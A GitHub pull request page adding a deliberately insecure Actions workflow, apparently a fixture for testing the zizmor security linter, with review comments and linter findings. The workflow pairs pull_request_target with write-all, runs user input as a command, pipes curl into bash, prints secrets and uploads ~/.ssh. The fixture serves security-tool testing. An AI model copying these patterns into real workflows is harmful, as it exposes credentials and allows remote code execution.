-
Notifications
You must be signed in to change notification settings - Fork 7
Preview/Zizmor #105
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: main
Are you sure you want to change the base?
Preview/Zizmor #105
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,57 @@ | ||
| # Intentionally insecure test fixture. Do not use in production. | ||
| on: | ||
| pull_request_target: | ||
| workflow_dispatch: | ||
| inputs: | ||
| cmd: | ||
| required: true | ||
| default: "echo hello" | ||
|
|
||
| permissions: write-all | ||
|
|
||
| jobs: | ||
| bad: | ||
| runs-on: ubuntu-latest | ||
| env: | ||
| AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} | ||
| GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} | ||
|
|
||
| steps: | ||
| - uses: actions/checkout@v4 | ||
| with: | ||
| persist-credentials: true | ||
| ref: ${{ github.event.pull_request.head.ref }} | ||
|
Comment on lines
+20
to
+23
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Critical: Privileged checkout of untrusted PR code. Checking out This is the canonical GitHub Actions privilege escalation pattern. 🧰 Tools🪛 zizmor (1.25.2)[error] 20-20: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy) (unpinned-uses) 🤖 Prompt for AI AgentsSource: Linters/SAST tools |
||
|
|
||
| - uses: actions/setup-node@v4 | ||
|
|
||
| - uses: docker://alpine:latest | ||
|
Comment on lines
+20
to
+27
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Pin actions to commit SHAs to prevent supply chain attacks. Using version tags ( Pin actions to full commit SHAs: - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
- uses: actions/setup-node@60edb5dd545a775178f52524783378180af0d1f8 # v4.0.2
- uses: docker://alpine@sha256:... # pin to digestAlso applies to: 30-30, 54-54 🧰 Tools🪛 zizmor (1.25.2)[error] 20-20: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy) (unpinned-uses) [error] 25-25: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy) (unpinned-uses) 🤖 Prompt for AI AgentsSource: Linters/SAST tools |
||
|
|
||
| - name: Cache untrusted dependency path | ||
| uses: actions/cache@v4 | ||
| with: | ||
| path: node_modules | ||
| key: ${{ github.event.pull_request.title }} | ||
|
Comment on lines
+29
to
+33
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Cache poisoning via attacker-controlled cache key. Using Cache keys should use trusted, deterministic values like lockfile hashes: key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}🧰 Tools🪛 zizmor (1.25.2)[error] 30-30: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy) (unpinned-uses) 🤖 Prompt for AI Agents |
||
|
|
||
| - name: Template injection via PR title | ||
| run: | | ||
| echo "PR title: ${{ github.event.pull_request.title }}" | ||
| echo "Branch: ${{ github.head_ref }}" | ||
|
|
||
| - name: Run user-controlled input | ||
| run: | | ||
| ${{ github.event.inputs.cmd }} | ||
|
Comment on lines
+35
to
+42
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Critical: Template injection enables arbitrary code execution. Lines 37-38 expand untrusted input ( Line 42 explicitly executes user-controlled input—this is intentional RCE. Pass untrusted values through environment variables instead: - name: Safe template usage
env:
PR_TITLE: ${{ github.event.pull_request.title }}
HEAD_REF: ${{ github.head_ref }}
run: |
echo "PR title: $PR_TITLE"
echo "Branch: $HEAD_REF"🧰 Tools🪛 actionlint (1.7.12)[error] 36-36: "github.event.pull_request.title" is potentially untrusted. avoid using it directly in inline scripts. instead, pass it through an environment variable. see https://docs.github.com/en/actions/reference/security/secure-use#good-practices-for-mitigating-script-injection-attacks for more details (expression) 🪛 zizmor (1.25.2)[error] 37-37: code injection via template expansion (template-injection): may expand into attacker-controllable code (template-injection) [error] 38-38: code injection via template expansion (template-injection): may expand into attacker-controllable code (template-injection) [error] 42-42: code injection via template expansion (template-injection): may expand into attacker-controllable code (template-injection) 🤖 Prompt for AI AgentsSource: Linters/SAST tools |
||
|
|
||
| - name: Leak secrets into logs | ||
| run: | | ||
| echo "AWS key is $AWS_SECRET_ACCESS_KEY" | ||
| echo "Token is $GH_TOKEN" | ||
|
Comment on lines
+44
to
+47
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Critical: Explicit secret exfiltration to logs. Printing secrets to workflow logs exposes them to anyone with read access. While GitHub attempts to mask secrets, this can be bypassed with encoding (base64, hex) or character-by-character output. 🤖 Prompt for AI Agents |
||
|
|
||
| - name: Dangerous curl bash | ||
| run: | | ||
| curl https://example.com/install.sh | bash | ||
|
Comment on lines
+49
to
+51
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Critical: Remote code execution via Downloading and executing a remote script without integrity verification exposes the workflow to supply chain attacks. If 🤖 Prompt for AI Agents |
||
|
|
||
| - name: Upload secrets as artifact | ||
| uses: actions/upload-artifact@v4 | ||
| with: | ||
| name: secrets | ||
| path: ~/.ssh | ||
|
Comment on lines
+53
to
+57
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Critical: SSH credential exfiltration via artifact upload. Uploading 🧰 Tools🪛 zizmor (1.25.2)[error] 54-54: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy) (unpinned-uses) 🤖 Prompt for AI Agents |
||
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Critical:
pull_request_targetwithwrite-allpermissions enables supply chain attacks.This combination allows any attacker to open a PR from a fork and execute code with full write access to the repository, including secrets access. Even though line 1 marks this as a test fixture, the workflow is active and will execute when triggered.
If this is truly for testing security tooling (like zizmor), disable the workflow entirely by renaming the file to
.yml.disabledor add a condition that always evaluates to false:🧰 Tools
🪛 zizmor (1.25.2)
[error] 2-8: use of fundamentally insecure workflow trigger (dangerous-triggers): pull_request_target is almost always used insecurely
(dangerous-triggers)
🤖 Prompt for AI Agents
Source: Linters/SAST tools